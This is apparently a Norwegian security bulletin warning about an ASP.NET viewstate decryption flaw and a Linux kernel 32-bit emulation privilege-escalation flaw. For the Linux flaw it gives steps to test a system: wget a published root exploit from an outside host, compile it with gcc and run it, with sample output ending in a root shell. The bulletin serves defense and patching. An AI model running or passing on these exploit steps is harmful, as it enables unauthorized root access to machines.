Microsoft har kommet ut med en advarsel om en svakhet i ASP.NET og Linux-kjernen er sårbar for en svakhet i 32-bits emuleringen. Begge disse rangeres som kritisk og blir aktivt utnyttet.
Svakhet i ASP.NET (Microsoft Security Advisory #2416728)
Microsoft har kommet med informasjon om en svakhet i ASP.NET som vil gi en angriper mulighet til å lese og endre viewstate som er blitt kryptert av server. Viewstate brukes i ASP .NET for å kunne beholde tilstanden (state) mellom ulike postback til webserver, og gjøres ved at nettsiden inneholder et skjult kryptert felt som lagrer den nødvendige informasjonen. Angrepet utføres ved å modifisere viewstate og sende dette tilbake til server for så å observere responsen fra server. Ved å gjøre dette gjenatte ganger skal det være mulig å tilegne seg nok informasjon til å kunne dekryptere, lese, samt modifisere viewstate som sendes tilbake til server. Denne svakheten er allerede blitt demonstrert (av forskere), og vi vet jo at kriminelle ikke ligger på latsiden. |
||||
Anbefaling | ||||
---|---|---|---|---|
Vent på patch ifra Microsoft. | ||||
Referanser | ||||
https://www.microsoft.com/technet/security/advisory/2416728.mspx http://it.slashdot.org/story/10/09/19/1941258/Researchers-Demo-ASPNET-Crypto-Attack http://it.slashdot.org/story/10/09/13/167239/New-Crypto-Attack-Affects-Millions-of-ASPNET-Apps |
Sikkerhetshull i Linux-kjernen gir root-tilgang
Exploitkode har blitt publisert på hvordan du kan utnytte et sikkerhetshull i Linux-kjernen for å øke dine egne rettigheter til å gi deg root-tilgang. Koden benytter seg av en svakhet i kompatibilitetsmodusen til kjernen som gjør at du kan kjøre 32-bits-applikasjoner på x86_64-arkitektur. Utviklerne av Linux-kjernen har laget en patch for å fikse problemet, men denne har ikke blitt pushet ut til de stabile utgivelsene enda. Se vedlegg for informasjon om hvordan en kan verifisere svakheten. |
||||
Anbefaling | ||||
---|---|---|---|---|
Inntil det kommer ny utgave av Linux-kjernen, skru av 32-bits-emulering. Dersom du benytter en distribusjon som publiserer egne patchede versjoner av Linuxkjerna, så anbefaler vi at du oppgraderer til siste utgave. Det er også mulig å slå av muligheten for å kjøre 32-bits programmer på et 64-bits system. Dersom du vil teste om systemet ditt er sårbart, kan du laste ned exploitkoden, og kjøre følgende kommandoer: bruker@server$ wget http://sota.gen.nz/compat2/robert_you_suck.c bruker@server$ gcc robert_you_suck.c -o robert Hvis systemet er sårbart, vil det se slik ut: bruker@server$ ./robert resolved symbol commit_creds to 0xffffffff8106ca60 resolved symbol prepare_kernel_cred to 0xffffffff8106cf90 mapping at 3f80000000 UID 0, EUID:0 GID:0, EGID:0 root@server# Hvis systemet ikke er sårbart, vil det se slik ut: bruker@server$ ./robert symbol table not available, aborting! Process finished |
||||
Referanser | ||||
http://seclists.org/fulldisclosure/2010/Sep/273 http://sota.gen.nz/compat2/ http://sota.gen.nz/compat2/robert_you_suck.c |